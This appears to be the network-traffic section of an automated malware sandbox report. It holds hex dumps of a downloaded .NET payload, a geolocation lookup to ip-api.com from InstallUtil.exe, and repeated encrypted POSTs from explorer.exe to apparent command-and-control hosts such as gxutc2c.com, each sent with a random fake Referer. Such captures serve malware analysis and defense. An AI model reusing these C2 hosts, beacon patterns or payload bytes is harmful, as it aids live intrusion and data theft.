                                                                                                                                                                    Jan 7, 2024 05:30:28.006481886 CET1286INData Raw: 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a 0e
                                                                                                                                                                    Data Ascii: 0(i+i]aXi2*6((+**0c (~-s~(+(++ i]XX _(X 2*(!*0w{X _}{
                                                                                                                                                                    Jan 7, 2024 05:30:28.006617069 CET1286INData Raw: 0a 00 00 00 00 13 30 01 00 18 00 00 00 0c 00 00 11 72 39 02 00 70 28 12 00 00 06 0a 12 00 28 49 00 00 0a 2c 02 17 2a 16 2a 13 30 02 00 16 00 00 00 0d 00 00 11 16 0a 28 4a 00 00 0a 6f 4b 00 00 0a 12 00 28 14 00 00 06 26 06 2a 00 00 1b 30 02 00 36
                                                                                                                                                                    Data Ascii: 0r9p((I,**0(JoK(&*06(L(M((L(MYj/&**//(!*}:glSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.
                                                                                                                                                                    Jan 7, 2024 05:30:28.006704092 CET1286INData Raw: 71 00 65 00 6f 00 64 00 6d 00 73 00 68 00 73 00 66 00 6b 00 71 00 71 00 65 00 6f 00 64 00 6d 00 73 00 68 00 73 00 66 00 6b 00 71 00 71 00 65 00 6f 00 64 00 6d 00 73 00 68 00 73 00 66 00 6b 00 71 00 71 00 65 00 6f 00 64 00 6d 00 73 00 68 00 73 00
                                                                                                                                                                    Data Ascii: qeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshsfkqqeodmshnf
                                                                                                                                                                    Jan 7, 2024 05:30:28.006795883 CET1286INData Raw: 8f 00 68 00 73 e8 77 05 6b 00 1b 00 1b 00 8d 08 6a 00 64 6a 6d 6a 73 e8 44 06 73 00 e5 c4 73 e8 3b ff 8e ff 0f 00 87 3e 62 00 6d 6a 73 e8 2f 06 73 00 e5 c4 63 8d 04 c8 b6 45 99 ff 90 ff 9b e8 17 03 73 00 c9 70 3d 80 66 a3 b7 3e b3 00 d0 d8 5b c2
                                                                                                                                                                    Data Ascii: hswkjdjmjsDss;>bmjs/scEsp=f>[o/l#jh>(AdS={Lp,MQju9D[ovP8chndvkx$eo>TKxq|(Ko`1=>f6|Uejojm&:jfjkdae*4
                                                                                                                                                                    Jan 7, 2024 05:30:28.006880045 CET1286INData Raw: 9d ff 04 0c 0f 0a 05 00 9b 75 65 e8 77 06 68 00 f0 c4 76 5d a8 8b 8e 55 fa ec 38 e9 b3 ff 9b ff e6 ff 26 8b 84 5d 9a 06 60 00 6b 8b 8e 55 fa ec e4 ec 47 03 64 00 cc c8 33 80 68 33 b6 89 23 fc 9d 05 71 40 f1 00 64 56 1b 08 0e 0a 85 33 7f 00 68 59
                                                                                                                                                                    Data Ascii: uewhv]U8&]`kUGd3h3#q@dV3hYplktyjsd4v(siqfffEa0fk/P
                                                                                                                                                                    Jan 7, 2024 05:30:28.007083893 CET1286INData Raw: a6 80 9a 61 e8 f9 6a 0f d8 cb 1c 03 f2 e9 51 83 a4 c9 54 4d 70 73 74 83 3e 18 60 39 36 fc 14 27 1e 04 4a ca 07 21 e6 4d 77 04 e7 7d 7d 00 06 23 e3 45 6b 4f ce 08 1e 20 f2 7d 61 00 11 03 e4 7d 68 83 08 fc 73 eb 33 8b 2e fc 69 af 36 14 72 d9 f8 5d
                                                                                                                                                                    Data Ascii: ajQTMpst>`96'J!Mw}}#EkO }a}hs3.i6r]pGwu}juL}mwauM9&ho!ls"hst`&~ mjdXb6E{ts]*ftn.}Ep*EctqVqtv `^(_6UB!uh
                                                                                                                                                                    Jan 7, 2024 05:30:28.007150888 CET1286INData Raw: 1e 16 f0 fa 71 01 65 00 1d 0e e7 3d 41 3f b1 00 68 74 76 e9 77 36 6b 00 26 8b 88 83 9f 04 1d 31 93 d9 ee e1 70 74 64 2b a2 88 61 83 ac 01 f2 e9 70 75 93 8b a7 c1 84 08 6e c1 f8 c8 a9 e0 63 03 a7 8b a1 83 93 03 b0 e9 67 74 69 f3 cf 85 bf 74 79 88
                                                                                                                                                                    Data Ascii: qe=A?htvw6k&1ptd+apuncgtityoju5$m_ $i=# qQ<sQ;$ (B%98}c;rkkM{^]HPutg3]X"hzf2 HUo4m@}]yL*+tQ+tc
                                                                                                                                                                    Jan 7, 2024 05:30:28.007225037 CET1286INData Raw: ee 06 e5 07 f9 46 69 88 34 01 ec 46 69 c1 98 02 f9 47 67 83 a9 03 e7 c7 6e 83 8a 08 1a cc 80 a5 99 24 fe 24 58 40 71 8d 2c 00 4c d1 ee 06 e5 07 f9 46 69 c1 9a 02 ee 47 6a 83 b7 02 f2 c7 67 83 96 08 16 a6 9e a5 8c 24 fd 24 5a 40 66 90 48 d1 fb 06
                                                                                                                                                                    Data Ascii: Fi4FiGgn$$X@q,LFiGjg$$Z@fHnr$$X@e&)-{)(s)&(1(%($(3(3DDDDDDDDDDDDDDshOU)1[)$Q)3 )3:)+Ey^:
                                                                                                                                                                    Jan 7, 2024 05:30:28.007314920 CET1286INData Raw: 0d c0 67 03 b3 3b b9 73 6d 39 56 75 60 8b ac eb 71 33 a8 85 b3 74 6c 8b 33 08 f8 5d 8d 85 be 75 68 33 a4 e9 96 00 73 00 eb fb 76 75 6a 83 0b 08 71 33 b1 40 8c ea 6f 00 64 83 96 01 7c 84 b6 00 73 00 ed 4e 0b 89 3c f8 fa 4d 69 89 21 60 ef 48 69 83
                                                                                                                                                                    Data Ascii: g;sm9Vu`q3tl3]uh3svujq3@od|sN<Mi!`Higf1B=+BpS$g\d\oY@/suD1fBh};|9~=fFeo:=sFkq?=oFhsX=qFdm]=sFqeq=mFf
                                                                                                                                                                    Jan 7, 2024 05:30:28.242575884 CET1286INData Raw: 4a 0a a2 40 4b 0a fa 78 50 c6 33 34 66 83 ab 40 fa 0d 11 3f a7 00 ee c1 64 08 6d 00 48 c1 1a cc 15 39 1b ce 64 84 7b 01 71 00 ee 45 bf 3b a3 0f e9 ff 73 00 68 8b 4b 8d 3e 04 e6 04 4a 89 34 e4 db 00 67 00 64 3b 93 7c 71 8b 96 c7 36 e0 67 00 6b 00
                                                                                                                                                                    Data Ascii: J@KxP34f@?dmH9d{qE;shK>J4gd;|q6gk[@ MLmY*t%+`NenaLRs sf*@u$gh$+%{1&o8d-4s@ePE9RL[m|nNLYkq~!t%QK<fxstWj


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.449785208.95.112.1805544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:29.287564039 CET64OUTGET /json HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jan 7, 2024 05:30:29.383418083 CET474INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:28 GMT
                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                    Content-Length: 297
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 31 37 36 22 7d
                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.176"}


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.44978691.215.85.120802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:34.211791992 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://vrpyhybyscdqjqo.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 308
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:34.215567112 CET308OUTData Raw: 48 9d 8c cf 4e 66 52 2e 5c 70 53 26 79 db 22 ca 21 68 99 14 f8 19 aa da b2 19 a5 8c 03 85 de 92 f9 ac 8e bf 74 44 90 b7 a4 28 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a3 19 b3 8a 14 62 cc d6 4f 96 e4 e5 5c c4
                                                                                                                                                                    Data Ascii: HNfR.\pS&y"!htD(j~_=;}f=B!bO\+]z)M0s8-6gWk'+\Av uM<JJ.3E<=TQ4{$/kuJJL7P_@ NT!>)`2tc
                                                                                                                                                                    Jan 7, 2024 05:30:34.431304932 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:34 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.449788109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:37.058792114 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://aunqllmjsfhfl.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 260
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:37.058845043 CET260OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 2e fc a3
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA .[k,vub.i;P[nN>l/WgasngcO9BUnJ9Cla%*hu#{XOQ/v]c!%nXgl@zRatRj)
                                                                                                                                                                    Jan 7, 2024 05:30:37.458818913 CET253INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:37 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 04 00 00 00 72 e8 85 eb
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.449791109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:37.997220993 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://fgxpblrvkyqfs.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 264
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:37.997251987 CET264OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2d 1e ca 9d
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu-eHYbsU5VdIi<d]`$O_3\819+inI|scc./w4,hfST1#|uy|qR)+
                                                                                                                                                                    Jan 7, 2024 05:30:38.397644043 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:38 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.449793109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:38.762985945 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://byajjksfuiq.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 365
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:38.763035059 CET365OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 26 23 b1 a2
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu&#*YflD?x?V@~n2GY1r}%2N"3m(3\\-3r_>$J9of~1VdneP!a
                                                                                                                                                                    Jan 7, 2024 05:30:39.163790941 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:38 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.449796109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:39.436508894 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://uvkhejoinmlfb.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 339
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:39.436618090 CET339OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 56 4a ee bd
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuVJVO{NncW3dk$s:m6Tf!]J{(;7hSZTd RzdY^!kyWG2<j"gW/>
                                                                                                                                                                    Jan 7, 2024 05:30:39.836296082 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:39 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.449799109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:40.188584089 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://skysuydpgasd.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:40.188623905 CET362OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 71 2a a8 ec
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuq*y\C`xYfA'n,lk]8|luJKQL;bYX?7MeCHv|+.-Jj:fwuG55.c ~CE
                                                                                                                                                                    Jan 7, 2024 05:30:40.602292061 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:40 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
